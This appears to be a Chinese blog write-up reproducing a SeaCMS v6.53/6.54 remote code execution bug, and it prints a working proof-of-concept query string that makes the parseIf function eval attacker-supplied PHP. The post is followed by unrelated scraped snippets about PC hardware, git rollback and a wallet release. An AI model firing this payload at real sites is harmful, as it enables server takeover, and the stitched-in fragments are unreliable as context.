海洋cms v6 53 v6 54版本漏洞復現

2022-07-27 01:33:12 字數 1809 閱讀 8972

海洋cms v6.53 v6.54版本漏洞復現

文章裡說的很清楚echosearchpage函式中的content變數傳給了parself函式,跟蹤**,找到./include/main.class.php,可以看到parseif函式會將content內容eval執行,造成命令執行。

searchtype=5&searchword=&year=:e}&area=v&letter=al&yuyan=(join&jq=($_p&&ver=ost[9]))&9=ph&9=pinfo();
通過poc可以看出,通過對引數進行了替換之後,content中已經包含了如下攻擊payload:if:eval(join($_post[9]))

跟蹤**,找到./include/main.class.php,可以看到parseif函式會將content內容eval執行,造成命令執行。

win7 64位虛擬機器 + phpstudy

seacms(v6.53).rar      在網盤裡面找相應名字

網上現在最新的是6.55的已經修復了,這留個測試副本。

下面是自建的測試**,建站上用的phpstudy沒有任何問題

安裝完成介面

首頁後台admin/login.php?gotopage=%2fseacms%2fadmin%2f

這幾個位址可以記錄一下

網上提供的poc

執行結果,可見寫入9的**被執行

進一步利用,可以執行系統命令,剩下的就不多說了。

好了,收工。

發燒高階版v2 0版本

發燒高階版v2.0版本 2012年01月15日 cpu amd fx 8150 cpu系列 fx cpu主頻 3600 最大睿頻 4200 匯流排頻率 3.2gt s 插槽型別 socket am3 核心代號 bulldozer 核心數量 八核心 製作工藝 32 奈米 主機板 七彩虹戰旗c.a990...

五 恢復到v1 0版本

輸球總是令人不悅的,還是恢復1.0版本,只記錄顯示中國隊難得一次勝利的文字吧。首先,檢查歷史版本的命令 現在,讓我們回退到1.0版本。想想回退怎麼最方便,當然是說 麻煩回退到1.0版本。這樣的命令最簡單。但,不知你發現沒有,git記錄版本的東西,是一長串字元,而不是1.0 2.0 3.0 這樣的版本...

ABT 錢包 V2 6 版本介紹

此次公升級主要有以下更新 讓票券 證書 徽章 憑證等 nft 非同質通證 可驗證一直是 abt 錢包的目標,目前我們已經完成了這一里程碑!鏈上資產的可驗證對於去中心化應用開發者的重要性不言而喻,很多應用功能都需要依賴這一點來展開。目前大家可以在我們提供的 wallet playground veri...